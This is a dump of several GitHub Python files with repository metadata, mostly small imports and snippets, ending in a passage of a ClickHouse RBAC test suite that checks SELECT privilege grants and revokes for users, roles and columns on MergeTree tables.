| 6
|
02f27de27b9906f7b473a5d521d7b7acd80cfc7f
| 127
|
py
|
Python
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | 3
|
2019-12-09T17:23:43.000Z
|
2021-12-15T09:10:44.000Z
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | 1
|
2020-02-03T18:01:20.000Z
|
2020-02-03T18:27:43.000Z
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | null | null | null |
# Adjust the characters' ages based on the geometric mean of the pair:
# below the threshold the hero gains and the villain loses, otherwise
# the reverse (presumably game-balance logic -- hero/villain are defined
# elsewhere in this script).
geometric_mean = math.sqrt(villain.age * hero.age)
if geometric_mean < 10:
    hero.age += 2
    villain.age -= 1
else:
    hero.age -= 2
    villain.age += 1
| 18.142857
| 42
| 0.559055
| 21
| 127
| 3.380952
| 0.47619
| 0.422535
| 0.225352
| 0.422535
| 0.535211
| 0.535211
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0.275591
| 127
| 6
| 43
| 21.166667
| 0.706522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02f8acf5fd36055b7c674a5f9bcb5272d8fa428e
| 135
|
py
|
Python
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 17
|
2021-02-11T18:19:22.000Z
|
2022-02-08T06:12:50.000Z
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 80
|
2021-02-11T08:27:31.000Z
|
2021-10-13T21:33:22.000Z
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 5
|
2021-02-12T09:51:34.000Z
|
2022-02-08T09:25:15.000Z
|
from .abstract_zone_item import AbstractZoneItem
from .zone_line_item import ZoneLineItem
from .zone_region_item import ZoneRegionItem
| 33.75
| 48
| 0.888889
| 18
| 135
| 6.333333
| 0.555556
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 135
| 3
| 49
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b88acf79bbdd8abba9a0bb51160ce4d7eb9ad45d
| 39
|
py
|
Python
|
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
def screen_test():
    """Smoke-test hook for the screen module: print a marker string."""
    marker = "screen"
    print(marker)
| 13
| 19
| 0.641026
| 5
| 39
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179487
| 39
| 2
| 20
| 19.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
b8bfc94cdb2c2e9a54dc01d1cf70e697b70142ca
| 177
|
py
|
Python
|
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | 1
|
2022-03-28T19:55:55.000Z
|
2022-03-28T19:55:55.000Z
|
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | null | null | null |
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | null | null | null |
from deepq import init
from screen import get_window_rect, get_window_pixels
if __name__ == "__main__":
    # Script entry point: locate the game window and capture its pixels.
    # NOTE(review): `init` is imported above but never called here --
    # possibly dead, or invoked by a caller of this module; confirm.
    rect = get_window_rect()
    print(rect)  # echo the window bounding box for debugging
    get_window_pixels(rect)
| 25.285714
| 53
| 0.757062
| 26
| 177
| 4.538462
| 0.5
| 0.305085
| 0.330508
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 177
| 7
| 54
| 25.285714
| 0.802721
| 0
| 0
| 0
| 0
| 0
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b22bf9a285ffee715778b5565871ebf1218b7192
| 34
|
py
|
Python
|
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
from gmailIt.gmailIt import Email
| 17
| 33
| 0.852941
| 5
| 34
| 5.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2432405f85fd465a29747660167af2b0febe9c9
| 358
|
py
|
Python
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 2
|
2021-12-14T15:27:46.000Z
|
2021-12-14T15:34:16.000Z
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 33
|
2021-09-23T04:14:30.000Z
|
2022-01-24T13:21:32.000Z
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 11
|
2021-11-09T00:51:40.000Z
|
2021-11-10T12:04:16.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Generic utilities. Factor related functions out to separate files."""
from openvino.pyopenvino.util import numpy_to_c
from openvino.pyopenvino.util import clone_model
from openvino.pyopenvino.util import get_constant_from_source, replace_node, replace_output_update_name
| 39.777778
| 103
| 0.832402
| 51
| 358
| 5.647059
| 0.72549
| 0.125
| 0.229167
| 0.270833
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030864
| 0.094972
| 358
| 8
| 104
| 44.75
| 0.858025
| 0.405028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a22fbcbd2774a5e2dcb37f384d6ad1281d75b45d
| 44
|
py
|
Python
|
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
from .atomics import atomic_support_present
| 22
| 43
| 0.886364
| 6
| 44
| 6.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a236d65b713cc258b23a68cea03682d9f0c4eb86
| 31
|
py
|
Python
|
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
from .preattck import PreAttck
| 15.5
| 30
| 0.83871
| 4
| 31
| 6.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2425692b57e3f9926f2a05af100b8b74a2bbad1
| 106
|
py
|
Python
|
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
from .context import *
from .repository import *
from .daily import *
from .continuous_retrieval import *
| 21.2
| 35
| 0.773585
| 13
| 106
| 6.230769
| 0.538462
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 106
| 4
| 36
| 26.5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a25a2f6cedccff00dbfcc1c81ee7bb27e7f680e1
| 87
|
py
|
Python
|
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
# help(len)
# help(print)
# help("len")
# help(str)
# help(list)
# help("hi".replace)
| 10.875
| 20
| 0.586207
| 13
| 87
| 3.923077
| 0.538462
| 0.27451
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 7
| 21
| 12.428571
| 0.689189
| 0.83908
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a293b37b625f98887b548ea19cb7b52329e65b72
| 25
|
py
|
Python
|
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
from .later import Later
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2a1f7e490dcbf14c0d6ac61bbffcc87f05e9c71
| 18
|
py
|
Python
|
textattack/models/entailment/__init__.py
|
fighting41love/TextAttack
|
24e48f0022dc3a7bdcd5cbb3430f1c72cfcb522d
|
[
"MIT"
] | 2
|
2020-07-08T08:55:37.000Z
|
2020-09-03T00:57:38.000Z
|
textattack/models/entailment/__init__.py
|
SatoshiRobatoFujimoto/TextAttack
|
a809a9bddddff9f41750949e26edde26c8af6cfa
|
[
"MIT"
] | null | null | null |
textattack/models/entailment/__init__.py
|
SatoshiRobatoFujimoto/TextAttack
|
a809a9bddddff9f41750949e26edde26c8af6cfa
|
[
"MIT"
] | null | null | null |
from . import bert
| 18
| 18
| 0.777778
| 3
| 18
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 18
| 1
| 18
| 18
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2d3092f1c3c3a27698cdfae61ccb8ab3f468427
| 26,409
|
py
|
Python
|
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | 1
|
2020-10-19T06:32:10.000Z
|
2020-10-19T06:32:10.000Z
|
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | null | null | null |
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | null | null | null |
from contextlib import contextmanager
import json
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
import rbac.tests.errors as errors
# DDL templates, one per MergeTree-family engine under test.
# Each template contains a single `{name}` placeholder that the
# `table()` context manager below fills in before executing.
table_types = {
    "MergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = MergeTree(d, (a, b), 111)",
    "ReplacingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = ReplacingMergeTree(d, (a, b), 111)",
    "SummingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = SummingMergeTree(d, (a, b), 111)",
    "AggregatingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = AggregatingMergeTree(d, (a, b), 111)",
    "CollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = CollapsingMergeTree(d, (a, b), 111, y);",
    "VersionedCollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32, version UInt64, sign Int8, INDEX a (b * y, d) TYPE minmax GRANULARITY 3) ENGINE = VersionedCollapsingMergeTree(sign, version) ORDER BY tuple()",
    "GraphiteMergeTree": "CREATE TABLE {name} (key UInt32, Path String, Time DateTime, d Date, a String, b UInt8, x String, y Int8, z UInt32, Value Float64, Version UInt32, col UInt64, INDEX a (key * Value, Time) TYPE minmax GRANULARITY 3) ENGINE = GraphiteMergeTree('graphite_rollup_example') ORDER BY tuple()"
}
# Maps each engine name in `table_types` to the SRS requirement it covers;
# consumed by the `@Examples` decorator on `feature()` at the bottom of the
# file so every engine run is tagged with its own requirement.
table_requirements ={
    "MergeTree": RQ_SRS_006_RBAC_Privileges_Select_MergeTree("1.0"),
    "ReplacingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_ReplacingMergeTree("1.0"),
    "SummingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_SummingMergeTree("1.0"),
    "AggregatingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_AggregatingMergeTree("1.0"),
    "CollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_CollapsingMergeTree("1.0"),
    "VersionedCollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_VersionedCollapsingMergeTree("1.0"),
    "GraphiteMergeTree": RQ_SRS_006_RBAC_Privileges_Select_GraphiteMergeTree("1.0"),
}
@contextmanager
def table(node, name, table_type="MergeTree"):
    """Context manager: create a table of the given engine type on entry
    and always drop it on exit, even if creation or the body fails.
    """
    try:
        with Given(f"I have a {table_type} table"):
            ddl = table_types[table_type]
            node.query(ddl.format(name=name))
        yield
    finally:
        with Finally("I drop the table"):
            node.query("DROP TABLE IF EXISTS {}".format(name))
@contextmanager
def user(node, name):
    """Context manager: create the named user on entry and always drop it
    on exit, even if the body fails.
    """
    try:
        with Given("I have a user"):
            node.query("CREATE USER OR REPLACE {}".format(name))
        yield
    finally:
        with Finally("I drop the user"):
            node.query("DROP USER IF EXISTS {}".format(name))
@contextmanager
def role(node, role):
    """Context manager: create the named role on entry and always drop it
    on exit, even if the body fails.
    """
    try:
        with Given("I have a role"):
            node.query("CREATE ROLE OR REPLACE {}".format(role))
        yield
    finally:
        with Finally("I drop the role"):
            node.query("DROP ROLE IF EXISTS {}".format(role))
@TestScenario
def without_privilege(self, table_type, node=None):
    """Check that user without select privilege on a table is not able to select on that table.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"):
            with When("I run SELECT without privilege"):
                # Expect the server's "not enough privileges" error for user0.
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Grant("1.0"),
)
def user_with_privilege(self, table_type, node=None):
    """Check that user can select from a table on which they have select privilege.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        # NOTE(review): user88 is created and immediately dropped without
        # being used in any step — confirm this is intentional (it only
        # exercises user create/cleanup) and not leftover scaffolding.
        with user(node, "user88"):
            pass
        with user(node, "user0"):
            with When("I grant privilege"):
                node.query("GRANT SELECT ON merge_tree TO user0")
            with Then("I verify SELECT command"):
                # The granted user's result must match what the default
                # (fully privileged) user sees.
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Revoke("1.0"),
)
def user_with_revoked_privilege(self, table_type, node=None):
    """Check that user is unable to select from a table after select privilege
    on that table has been revoked from the user.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"):
            with When("I grant privilege"):
                node.query("GRANT SELECT ON merge_tree TO user0")
            with And("I revoke privilege"):
                node.query("REVOKE SELECT ON merge_tree FROM user0")
            with And("I use SELECT, throws exception"):
                # After the revoke the user must hit the privilege error again.
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
def user_with_privilege_on_columns(self, table_type):
    """Drive the `user_column_privileges` outline for this table engine by
    appending `table_type` to each of the outline's example rows."""
    Scenario(run=user_column_privileges,
        examples=Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass table_type",
            [tuple(list(row)+[table_type]) for row in user_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Column("1.0"),
)
@Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass", [
    ("d", "d", "x", "d", '\'2020-01-01\''),
    ("d,a", "d", "x", "d", '\'2020-01-01\''),
    ("d,a,b", "d,a,b", "x", "d,b", '\'2020-01-01\',9'),
    ("d,a,b", "b", "y", "d,a,b", '\'2020-01-01\',\'woo\',9')
])
def user_column_privileges(self, grant_columns, select_columns_pass, data_pass, table_type, revoke_columns=None, select_columns_fail=None, node=None):
    """Check that user is able to select on granted columns
    and unable to select on not granted or revoked columns.

    :param grant_columns: columns to grant SELECT on
    :param select_columns_pass: columns the insert/select steps use
    :param data_pass: literal VALUES payload matching select_columns_pass
    :param revoke_columns: columns to revoke afterwards (skipped when None)
    :param select_columns_fail: not-granted column expected to fail (skipped when None)
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type), user(node, "user0"):
        with Given("The table has some data on some columns"):
            node.query(f"INSERT INTO merge_tree ({select_columns_pass}) VALUES ({data_pass})")
        with When("I grant select privilege"):
            node.query(f"GRANT SELECT({grant_columns}) ON merge_tree TO user0")
        if select_columns_fail is not None:
            with And("I select from not granted column"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query(f"SELECT ({select_columns_fail}) FROM merge_tree",
                    settings = [("user","user0")], exitcode=exitcode, message=message)
        with Then("I select from granted column, verify correct result"):
            user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
            default = node.query("SELECT d FROM merge_tree")
            # Fixed: was a bare `assert`; `error()` attaches the testflows
            # failure context, matching every other scenario in this file.
            assert user_select.output == default.output, error()
        if revoke_columns is not None:
            with When("I revoke select privilege for columns from user"):
                node.query(f"REVOKE SELECT({revoke_columns}) ON merge_tree FROM user0")
            with And("I select from revoked columns"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query(f"SELECT ({select_columns_pass}) FROM merge_tree", settings = [("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Grant("1.0"),
)
def role_with_privilege(self, table_type, node=None):
    """Check that user can select from a table after it is granted a role that
    has the select privilege for that table.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        with user(node, "user0"):
            with role(node, "role0"):
                with When("I grant select privilege to a role"):
                    node.query("GRANT SELECT ON merge_tree TO role0")
                with And("I grant role to the user"):
                    node.query("GRANT role0 TO user0")
                with Then("I verify SELECT command"):
                    # Privilege must flow through the role to the user.
                    user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
                    default = node.query("SELECT d FROM merge_tree")
                    assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Revoke("1.0"),
)
def role_with_revoked_privilege(self, table_type, node=None):
    """Check that user with a role that has select privilege on a table is unable
    to select from that table after select privilege has been revoked from the role.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), role(node, "role0"):
            with When("I grant privilege to a role"):
                node.query("GRANT SELECT ON merge_tree TO role0")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            with And("I revoke privilege from the role"):
                node.query("REVOKE SELECT ON merge_tree FROM role0")
            with And("I select from the table"):
                # Revoking from the role must also cut off the user.
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
def user_with_revoked_role(self, table_type, node=None):
    """Check that user with a role that has select privilege on a table is unable to
    select from that table after the role with select privilege has been revoked from the user.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), role(node, "role0"):
            with When("I grant privilege to a role"):
                node.query("GRANT SELECT ON merge_tree TO role0")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            with And("I revoke the role from the user"):
                # Unlike role_with_revoked_privilege, here the role keeps the
                # privilege but the user loses the role.
                node.query("REVOKE role0 FROM user0")
            with And("I select from the table"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
def role_with_privilege_on_columns(self, table_type):
    """Drive the `role_column_privileges` outline for this table engine by
    appending `table_type` to each of the outline's example rows."""
    Scenario(run=role_column_privileges,
        examples=Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass table_type",
            [tuple(list(row)+[table_type]) for row in role_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_Column("1.0"),
)
@Examples("grant_columns revoke_columns select_columns_fail select_columns_pass data_pass", [
    ("d", "d", "x", "d", '\'2020-01-01\''),
    ("d,a", "d", "x", "d", '\'2020-01-01\''),
